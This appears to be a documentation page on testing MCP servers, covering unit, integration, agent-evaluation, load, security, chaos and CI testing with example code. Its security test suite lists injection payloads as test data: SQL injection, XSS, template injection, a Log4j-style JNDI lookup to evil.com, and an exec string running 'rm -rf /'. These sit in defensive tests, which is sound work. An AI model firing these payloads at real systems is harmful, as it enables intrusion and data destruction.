Skip to content

Test

Validate MCP servers for correctness, safety, performance, and AI agent compatibility. Focus on behavior, contracts, and real-world agent interactions through systematic testing approaches.

Testing Philosophy

Core Testing Principles

  • Behavior-driven validation: Test what the server does, not just how it's implemented
  • Contract-first testing: Validate schemas, inputs, outputs, and side effects rigorously
  • Agent-centric evaluation: Test how AI agents actually interact with your tools
  • Production simulation: Test with realistic data, load patterns, and failure scenarios
  • Continuous validation: Integrate testing into development workflow and deployment pipeline

Quality Gates and Success Criteria

  • Functional correctness: All tools produce expected outputs for valid inputs
  • Safety and security: Invalid inputs are rejected, authorization is enforced
  • Performance standards: Latency and throughput meet defined SLOs
  • Agent usability: AI agents can discover, understand, and effectively use tools
  • Reliability: Server handles failures gracefully and maintains availability

Testing Pyramid for MCP Servers

Unit Tests (Foundation - 60-70%)

Purpose: Fast, isolated validation of individual components and business logic

Focus areas: - Tool logic and algorithms - Input validation and sanitization - Error handling and edge cases - Configuration management - Utility functions and helpers

Example unit test structure:

import pytest
from unittest.mock import Mock, patch
from your_server.tools import process_data

class TestProcessDataTool:
    def test_valid_input_processing(self):
        """Test tool with valid input produces expected output"""
        result = process_data("valid input", {"option": "value"})
        assert result.success is True
        assert result.data == expected_output

    def test_invalid_input_rejection(self):
        """Test tool properly rejects invalid input"""
        with pytest.raises(ValueError, match="Invalid input format"):
            process_data("", {})

    def test_edge_case_handling(self):
        """Test tool handles edge cases gracefully"""
        large_input = "x" * 10000
        result = process_data(large_input, {})
        assert len(result.data) <= 1000  # Truncated appropriately

    @patch('your_server.external_api.call_service')
    def test_dependency_failure_handling(self, mock_api):
        """Test tool handles external dependency failures"""
        mock_api.side_effect = ConnectionError("Service unavailable")
        with pytest.raises(ServiceUnavailableError):
            process_data("test", {"use_external": True})

Integration Tests (Structure - 20-30%)

Purpose: Validate MCP protocol compliance and component interactions

Focus areas: - MCP protocol message handling - Tool discovery and schema validation - Resource access and content delivery - Authentication and authorization flows - Database and external service integrations

MCP protocol integration tests:

import pytest
from mcp.client import McpClient
from your_server import start_server

@pytest.mark.asyncio
class TestMCPIntegration:
    async def test_server_initialization(self):
        """Test server starts and responds to initialization"""
        async with McpClient() as client:
            info = await client.initialize()
            assert info.protocol_version == "0.1.0"
            assert info.server_info.name == "your-server"

    async def test_tool_discovery(self):
        """Test tool discovery returns correct schemas"""
        async with McpClient() as client:
            await client.initialize()
            tools = await client.list_tools()

            assert len(tools) > 0
            process_tool = next(t for t in tools if t.name == "process_data")
            assert process_tool.input_schema is not None
            assert "text" in process_tool.input_schema["properties"]

    async def test_tool_execution_flow(self):
        """Test complete tool execution workflow"""
        async with McpClient() as client:
            await client.initialize()

            result = await client.call_tool(
                "process_data",
                {"text": "test input", "options": {}}
            )

            assert result.is_error is False
            assert "result" in result.content[0].text

    async def test_authorization_enforcement(self):
        """Test authorization is properly enforced"""
        async with McpClient(token="invalid") as client:
            await client.initialize()

            with pytest.raises(PermissionError):
                await client.call_tool("restricted_tool", {})

End-to-End Tests (Integration - 10-15%)

Purpose: Validate complete workflows with real configurations and dependencies

Focus areas: - Gateway integration and routing - Multi-server orchestration - Production-like configurations - Real external service interactions - Performance under realistic load

E2E test example:

import pytest
import asyncio
from test_utils import start_gateway, register_server, create_test_client

@pytest.mark.e2e
class TestCompleteWorkflow:
    @pytest.fixture
    async def gateway_setup(self):
        """Setup gateway with registered server"""
        gateway = await start_gateway()
        await register_server(gateway, "test-server", "http://localhost:8000")
        yield gateway
        await gateway.shutdown()

    async def test_client_to_server_via_gateway(self, gateway_setup):
        """Test complete client → gateway → server flow"""
        client = create_test_client(gateway_url="http://localhost:4444")

        # Test tool discovery through gateway
        tools = await client.discover_tools()
        assert "process_data" in [t.name for t in tools]

        # Test tool execution through gateway
        result = await client.execute_tool(
            "process_data",
            {"text": "integration test", "options": {"format": "json"}}
        )

        assert result.success is True
        assert "integration test" in str(result.data)

Agent Evaluation and AI Testing

Agent Eval Framework

Purpose: Evaluate how effectively AI agents can discover, understand, and use your MCP tools

Agent Eval provides systematic evaluation of MCP servers from an AI agent perspective, measuring: - Discoverability: How easily agents find relevant tools - Usability: How successfully agents use tools to complete tasks - Reliability: How consistently tools work across different agent interactions - Task completion: How well agents accomplish goals using your tools

Agent Eval implementation:

from agent_eval import Evaluator, TaskSet, Agent

class MCPServerEvaluator:
    def __init__(self, server_url: str):
        self.evaluator = Evaluator()
        self.server_url = server_url
        self.agent = Agent(
            model="claude-3-sonnet",
            mcp_server=server_url
        )

    def create_task_suite(self) -> TaskSet:
        """Define evaluation tasks for your MCP server"""
        return TaskSet([
            {
                "name": "data_processing_task",
                "description": "Process user data and return formatted results",
                "input": "Process this CSV data: name,age\\nJohn,25\\nJane,30",
                "expected_capabilities": ["process_data", "format_output"],
                "success_criteria": [
                    "Data is correctly parsed",
                    "Output is properly formatted",
                    "No errors in processing"
                ]
            },
            {
                "name": "error_handling_task",
                "description": "Handle invalid input gracefully",
                "input": "Process this invalid data: !!!invalid!!!",
                "expected_behavior": "graceful_error_handling",
                "success_criteria": [
                    "Error is caught and handled",
                    "Meaningful error message provided",
                    "Agent can recover and suggest alternatives"
                ]
            }
        ])

    async def run_evaluation(self) -> dict:
        """Run comprehensive agent evaluation"""
        task_suite = self.create_task_suite()

        results = await self.evaluator.evaluate(
            agent=self.agent,
            tasks=task_suite,
            iterations=10  # Run multiple times for statistical significance
        )

        return {
            "overall_score": results.overall_score,
            "task_success_rate": results.task_success_rate,
            "tool_usage_efficiency": results.tool_usage_efficiency,
            "error_handling_score": results.error_handling_score,
            "detailed_results": results.task_results
        }

Cross-Model Validation

Test with multiple AI models to ensure broad compatibility:

@pytest.mark.agent_eval
class TestCrossModelCompatibility:
    models = ["claude-3-sonnet", "gpt-4", "gemini-pro"]

    @pytest.mark.parametrize("model", models)
    async def test_model_tool_usage(self, model):
        """Test tool usage across different AI models"""
        agent = Agent(model=model, mcp_server=self.server_url)

        # Test basic tool discovery
        tools = await agent.discover_tools()
        assert len(tools) > 0

        # Test tool usage with standard task
        result = await agent.complete_task(
            "Process the data: name,value\ntest,123",
            available_tools=tools
        )

        assert result.success_rate > 0.8  # 80% success threshold
        assert result.tool_calls > 0
        assert "123" in str(result.output)

Behavioral Testing and Golden Sets

Golden set evaluation for consistent behavior validation:

class GoldenSetTester:
    def __init__(self):
        self.golden_sets = self.load_golden_sets()

    def load_golden_sets(self) -> dict:
        """Load curated test cases with expected outputs"""
        return {
            "data_processing": [
                {
                    "input": {"text": "hello world", "format": "upper"},
                    "expected_output": "HELLO WORLD",
                    "metadata": {"operation": "case_conversion"}
                },
                {
                    "input": {"text": "test@example.com", "format": "email_validation"},
                    "expected_output": {"valid": True, "domain": "example.com"},
                    "metadata": {"operation": "email_processing"}
                }
            ]
        }

    async def validate_against_golden_set(self, tool_name: str) -> dict:
        """Validate tool outputs against golden set"""
        test_cases = self.golden_sets.get(tool_name, [])
        results = []

        for case in test_cases:
            try:
                actual_output = await call_tool(tool_name, case["input"])
                match = self.compare_outputs(actual_output, case["expected_output"])
                results.append({
                    "test_case": case,
                    "actual_output": actual_output,
                    "matches_expected": match,
                    "passed": match
                })
            except Exception as e:
                results.append({
                    "test_case": case,
                    "error": str(e),
                    "passed": False
                })

        return {
            "total_tests": len(test_cases),
            "passed": sum(1 for r in results if r["passed"]),
            "pass_rate": sum(1 for r in results if r["passed"]) / len(test_cases),
            "detailed_results": results
        }

Performance and Load Testing

Load Testing Strategy

Establish performance baselines and validate under realistic load:

import asyncio
import time
from concurrent.futures import ThreadPoolExecutor

class LoadTester:
    def __init__(self, server_url: str):
        self.server_url = server_url
        self.metrics = {
            "requests_sent": 0,
            "requests_successful": 0,
            "response_times": [],
            "errors": []
        }

    async def single_request_test(self, tool_name: str, params: dict):
        """Execute single request and measure performance"""
        start_time = time.time()

        try:
            result = await call_tool(tool_name, params)
            response_time = time.time() - start_time

            self.metrics["requests_sent"] += 1
            self.metrics["requests_successful"] += 1
            self.metrics["response_times"].append(response_time)

            return result

        except Exception as e:
            self.metrics["requests_sent"] += 1
            self.metrics["errors"].append(str(e))
            raise

    async def load_test(self, tool_name: str, params: dict,
                       concurrent_users: int, duration_seconds: int):
        """Run load test with specified concurrency and duration"""
        end_time = time.time() + duration_seconds
        tasks = []

        while time.time() < end_time:
            # Maintain specified concurrency
            active_tasks = [t for t in tasks if not t.done()]

            while len(active_tasks) < concurrent_users and time.time() < end_time:
                task = asyncio.create_task(
                    self.single_request_test(tool_name, params)
                )
                tasks.append(task)
                active_tasks.append(task)

                # Small delay to prevent overwhelming
                await asyncio.sleep(0.1)

        # Wait for remaining tasks
        await asyncio.gather(*tasks, return_exceptions=True)

        return self.analyze_results()

    def analyze_results(self) -> dict:
        """Analyze load test results"""
        response_times = self.metrics["response_times"]

        if not response_times:
            return {"error": "No successful responses recorded"}

        return {
            "total_requests": self.metrics["requests_sent"],
            "successful_requests": self.metrics["requests_successful"],
            "error_rate": len(self.metrics["errors"]) / self.metrics["requests_sent"],
            "avg_response_time": sum(response_times) / len(response_times),
            "p50_response_time": sorted(response_times)[len(response_times)//2],
            "p95_response_time": sorted(response_times)[int(len(response_times)*0.95)],
            "p99_response_time": sorted(response_times)[int(len(response_times)*0.99)],
            "requests_per_second": len(response_times) / max(response_times) if response_times else 0
        }

# Usage in tests
@pytest.mark.performance
class TestPerformance:
    async def test_single_user_latency(self):
        """Test response times under normal load"""
        tester = LoadTester("http://localhost:8000")

        result = await tester.load_test(
            tool_name="process_data",
            params={"text": "performance test", "options": {}},
            concurrent_users=1,
            duration_seconds=30
        )

        assert result["p95_response_time"] < 0.5  # 500ms SLO
        assert result["error_rate"] < 0.01  # <1% error rate

    async def test_concurrent_users_throughput(self):
        """Test throughput under concurrent load"""
        tester = LoadTester("http://localhost:8000")

        result = await tester.load_test(
            tool_name="process_data",
            params={"text": "load test", "options": {}},
            concurrent_users=10,
            duration_seconds=60
        )

        assert result["requests_per_second"] > 50  # Minimum throughput
        assert result["error_rate"] < 0.05  # <5% error rate under load

Security and Safety Testing

Security Test Suite

Validate security controls and resistance to common attacks:

class SecurityTester:
    def __init__(self, server_url: str):
        self.server_url = server_url

    async def test_input_injection_attacks(self):
        """Test resistance to injection attacks"""
        injection_payloads = [
            "'; DROP TABLE users; --",
            "<script>alert('xss')</script>",
            "{{7*7}}",  # Template injection
            "${jndi:ldap://evil.com/a}",  # Log4j style
            "'; exec('import os; os.system(\"rm -rf /\")')"
        ]

        for payload in injection_payloads:
            try:
                result = await call_tool("process_data", {"text": payload})

                # Result should be sanitized, not executed
                assert payload not in str(result)
                assert "<script>" not in str(result).lower()
                assert "drop table" not in str(result).lower()

            except ValueError:
                # Input rejection is acceptable
                pass

    async def test_authorization_bypass_attempts(self):
        """Test authorization cannot be bypassed"""
        bypass_attempts = [
            {"token": "invalid_token"},
            {"token": "../../../admin_token"},
            {"user_id": -1},
            {"permissions": ["admin", "all"]},
        ]

        for attempt in bypass_attempts:
            with pytest.raises((PermissionError, AuthenticationError)):
                await call_tool_with_context("admin_tool", {}, context=attempt)

    async def test_rate_limiting(self):
        """Test rate limiting prevents abuse"""
        # Make rapid requests to trigger rate limiting
        tasks = []
        for i in range(100):  # Exceed rate limit
            tasks.append(call_tool("process_data", {"text": f"test {i}"}))

        results = await asyncio.gather(*tasks, return_exceptions=True)

        # Some requests should be rate limited
        rate_limited_count = sum(1 for r in results if isinstance(r, RateLimitError))
        assert rate_limited_count > 0

Chaos Testing and Fault Injection

Test resilience under failure conditions:

class ChaosTester:
    async def test_dependency_failures(self):
        """Test behavior when external dependencies fail"""
        with patch('external_service.call') as mock_service:
            # Simulate various failure modes
            failure_scenarios = [
                ConnectionError("Connection refused"),
                TimeoutError("Request timeout"),
                HTTPError("500 Internal Server Error"),
                json.JSONDecodeError("Invalid JSON", "", 0)
            ]

            for error in failure_scenarios:
                mock_service.side_effect = error

                result = await call_tool("external_dependent_tool", {"param": "test"})

                # Should fail gracefully with meaningful error
                assert "error" in result
                assert "temporarily unavailable" in result["error"].lower()

    async def test_resource_exhaustion(self):
        """Test behavior under resource constraints"""
        # Test with large inputs to stress memory
        large_input = "x" * (10 * 1024 * 1024)  # 10MB

        try:
            result = await call_tool("process_data", {"text": large_input})

            # Should either process successfully or fail gracefully
            assert result is not None

        except ResourceExhaustedError as e:
            # Graceful resource exhaustion handling is acceptable
            assert "resource limit" in str(e).lower()

Automated Testing and CI/CD Integration

Continuous Integration Pipeline

Integrate all testing levels into your CI/CD pipeline:

# .github/workflows/test.yml (example)
name: Comprehensive Testing Pipeline

on: [push, pull_request]

jobs:
  unit-tests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install dependencies
        run: |
          pip install uv
          uv pip install -e .[test]

      - name: Run unit tests
        run: |
          pytest tests/unit/ -v --cov=src --cov-report=xml

      - name: Upload coverage
        uses: codecov/codecov-action@v3

  integration-tests:
    runs-on: ubuntu-latest
    needs: unit-tests
    steps:
      - name: Start test server
        run: |
          python -m src.server &
          sleep 5

      - name: Run integration tests
        run: |
          pytest tests/integration/ -v

  agent-evaluation:
    runs-on: ubuntu-latest
    needs: integration-tests
    steps:
      - name: Run Agent Eval
        run: |
          python -m tests.agent_eval --iterations=5
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}

  performance-tests:
    runs-on: ubuntu-latest
    needs: integration-tests
    steps:
      - name: Run performance tests
        run: |
          pytest tests/performance/ -v --timeout=300

  security-tests:
    runs-on: ubuntu-latest
    needs: unit-tests
    steps:
      - name: Run security scans
        run: |
          bandit -r src/
          safety check
          pytest tests/security/ -v

Test Automation Best Practices

Automated test management:

# conftest.py - Pytest configuration and fixtures
import pytest
import asyncio
from unittest.mock import Mock

@pytest.fixture(scope="session")
def event_loop():
    """Create event loop for async tests"""
    loop = asyncio.new_event_loop()
    yield loop
    loop.close()

@pytest.fixture
def mock_external_service():
    """Mock external service for isolated testing"""
    with patch('src.services.external_api') as mock:
        mock.get_data.return_value = {"status": "success", "data": "test"}
        yield mock

@pytest.fixture
async def test_server():
    """Start test server for integration tests"""
    server = await start_test_server(port=8001)
    yield server
    await server.shutdown()

# Parameterized tests for comprehensive coverage
@pytest.mark.parametrize("input_data,expected", [
    ("valid input", "processed: valid input"),
    ("", "error: empty input"),
    ("x" * 1000, "error: input too long"),
])
def test_input_variations(input_data, expected):
    result = process_input(input_data)
    assert expected in str(result)

Testing Standards and Quality Gates

Coverage Targets and Quality Metrics

Establish clear quality thresholds:

  • Unit test coverage: ≥ 85% for business logic, 100% for critical paths
  • Integration test coverage: All MCP protocol interactions and external dependencies
  • Agent evaluation score: ≥ 80% task completion rate across target models
  • Performance targets: P95 latency < 500ms, throughput > 50 RPS under normal load
  • Security validation: 100% of security test cases must pass
  • Error handling: All error scenarios have explicit tests

Pre-Release Testing Checklist

Functional Testing - [ ] All unit tests passing with required coverage - [ ] Integration tests validate MCP protocol compliance - [ ] End-to-end workflows complete successfully - [ ] Cross-model agent evaluation meets thresholds

Performance Validation - [ ] Load tests confirm SLO compliance - [ ] Resource usage within acceptable limits - [ ] Concurrent user scenarios handled properly - [ ] Performance regression tests passing

Security and Safety - [ ] Input validation prevents injection attacks - [ ] Authorization controls properly enforced - [ ] Rate limiting prevents abuse - [ ] Audit logging captures required events

Reliability Testing - [ ] Chaos tests validate fault tolerance - [ ] Dependency failure scenarios handled gracefully - [ ] Circuit breakers and timeouts configured - [ ] Recovery procedures validated

Agent Compatibility - [ ] Agent Eval scores meet minimum thresholds - [ ] Tool discovery works across target models - [ ] Error messages are agent-friendly - [ ] Documentation supports agent understanding

Regression Testing and Continuous Monitoring

Maintain quality over time:

class RegressionTester:
    def __init__(self):
        self.baseline_metrics = self.load_baseline()

    async def detect_regressions(self, current_results: dict) -> dict:
        """Compare current results against baseline"""
        regressions = {}

        for metric, current_value in current_results.items():
            baseline_value = self.baseline_metrics.get(metric)

            if baseline_value and self.is_regression(metric, current_value, baseline_value):
                regressions[metric] = {
                    "current": current_value,
                    "baseline": baseline_value,
                    "regression_percentage": self.calculate_regression_pct(
                        current_value, baseline_value
                    )
                }

        return regressions

    def is_regression(self, metric: str, current: float, baseline: float) -> bool:
        """Determine if current value represents a regression"""
        thresholds = {
            "success_rate": 0.05,  # 5% drop is significant
            "avg_response_time": 0.20,  # 20% increase is significant
            "agent_eval_score": 0.10,  # 10% drop is significant
        }

        threshold = thresholds.get(metric, 0.15)  # Default 15%

        if metric in ["success_rate", "agent_eval_score"]:
            # Lower is worse
            return current < baseline * (1 - threshold)
        else:
            # Higher is worse (latency, error rate)
            return current > baseline * (1 + threshold)

Testing Tools and Infrastructure

Core testing tools: - pytest: Primary testing framework with async support - pytest-cov: Code coverage measurement and reporting - pytest-mock: Mocking and patching capabilities - Agent Eval: AI agent evaluation framework - locust: Load testing and performance validation - bandit: Security vulnerability scanning - safety: Dependency vulnerability checking

Infrastructure tools: - docker-compose: Reproducible testing environments - testcontainers: Integration testing with real dependencies - Github Actions / Jenkins: CI/CD pipeline automation - SonarQube: Code quality and security analysis - Grafana/Prometheus: Performance monitoring and alerting


Next Steps: After comprehensive testing, proceed to Package for distribution preparation, then Deploy for production rollout strategies.

See Also: Develop, Best Practices, Package, Deploy, Operate, Secure.